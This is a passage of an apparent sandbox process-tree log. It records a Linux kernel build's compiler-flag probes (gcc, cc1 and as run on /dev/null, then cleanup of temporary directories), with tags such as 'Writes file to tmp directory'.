/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -c -x c /dev/null -o /tmp/a/.tmp_1808/tmp4⤵PID:1810
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1808/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" "-march=x86-64" -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fstack-protector-strong -o /tmp/ccHVA4mr.s5⤵PID:1811
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1808/tmp /tmp/ccHVA4mr.s5⤵PID:1812
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1808/tmp /tmp/ccHVA4mr.s5⤵PID:1812
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1808/tmp /tmp/ccHVA4mr.s5⤵PID:1812
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1808/tmp /tmp/ccHVA4mr.s5⤵
- Writes file to tmp directory
PID:1812
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18084⤵PID:1813
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -mfentry -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"y\"; else echo \"n\"; fi"3⤵PID:1814
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18144⤵PID:1815
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -mfentry -c -x c /dev/null -o /tmp/a/.tmp_1814/tmp4⤵
- Writes file to tmp directory
PID:1816 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1814/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fstack-protector-strong -o /tmp/cczamULp.s5⤵PID:1817
-
-
/usr/local/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1814/tmp /tmp/cczamULp.s5⤵PID:1818
-
-
/usr/local/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1814/tmp /tmp/cczamULp.s5⤵PID:1818
-
-
/usr/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1814/tmp /tmp/cczamULp.s5⤵PID:1818
-
-
/usr/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1814/tmp /tmp/cczamULp.s5⤵PID:1818
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18144⤵PID:1819
-
-
-
/usr/bin/gccgcc "-print-file-name=include"3⤵PID:1820
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wstringop-truncation -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-stringop-truncation\"; else echo \"\"; fi"3⤵PID:1821
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18214⤵PID:1822
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wstringop-truncation -c -x c /dev/null -o /tmp/a/.tmp_1821/tmp4⤵PID:1823
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D CC_USING_FENTRY /dev/null -quiet -dumpdir /tmp/a/.tmp_1821/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mrecord-mcount -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wstringop-truncation "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fstack-protector-strong -o /tmp/ccvviN1Y.s5⤵
- Writes file to tmp directory
PID:1824
-
-
/usr/local/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1821/tmp /tmp/ccvviN1Y.s5⤵PID:1825
-
-
/usr/local/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1821/tmp /tmp/ccvviN1Y.s5⤵PID:1825
-
-
/usr/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1821/tmp /tmp/ccvviN1Y.s5⤵PID:1825
-
-
/usr/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1821/tmp /tmp/ccvviN1Y.s5⤵PID:1825
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18214⤵PID:1826
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wzero-length-bounds -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-zero-length-bounds\"; else echo \"\"; fi"3⤵PID:1827
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18274⤵
- Reads runtime system information
PID:1828
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wzero-length-bounds -c -x c /dev/null -o /tmp/a/.tmp_1827/tmp4⤵
- Writes file to tmp directory
PID:1829 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D CC_USING_FENTRY /dev/null -quiet -dumpdir /tmp/a/.tmp_1827/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mrecord-mcount -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wzero-length-bounds "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fstack-protector-strong -o /tmp/ccrqeBOo.s5⤵
- Writes file to tmp directory
PID:1830
-
-
/usr/local/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1827/tmp /tmp/ccrqeBOo.s5⤵PID:1831
-
-
/usr/local/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1827/tmp /tmp/ccrqeBOo.s5⤵PID:1831
-
-
/usr/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1827/tmp /tmp/ccrqeBOo.s5⤵PID:1831
-
-
/usr/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1827/tmp /tmp/ccrqeBOo.s5⤵PID:1831
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18274⤵PID:1832
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wstringop-overflow -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-stringop-overflow\"; else echo \"\"; fi"3⤵PID:1833
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18334⤵
- Reads runtime system information
PID:1834
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wstringop-overflow -c -x c /dev/null -o /tmp/a/.tmp_1833/tmp4⤵
- Writes file to tmp directory
PID:1835 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D CC_USING_FENTRY /dev/null -quiet -dumpdir /tmp/a/.tmp_1833/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mrecord-mcount -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds "-Wstringop-overflow=2" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fstack-protector-strong -o /tmp/ccgmGTtF.s5⤵
- Writes file to tmp directory
PID:1836
-
-
/usr/local/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1833/tmp /tmp/ccgmGTtF.s5⤵PID:1837
-
-
/usr/local/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1833/tmp /tmp/ccgmGTtF.s5⤵PID:1837
-
-
/usr/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1833/tmp /tmp/ccgmGTtF.s5⤵PID:1837
-
-
/usr/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1833/tmp /tmp/ccgmGTtF.s5⤵
- Writes file to tmp directory
PID:1837
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18334⤵PID:1838
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wrestrict -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-restrict\"; else echo \"\"; fi"3⤵PID:1839
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18394⤵PID:1840
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wrestrict -c -x c /dev/null -o /tmp/a/.tmp_1839/tmp4⤵PID:1841
-
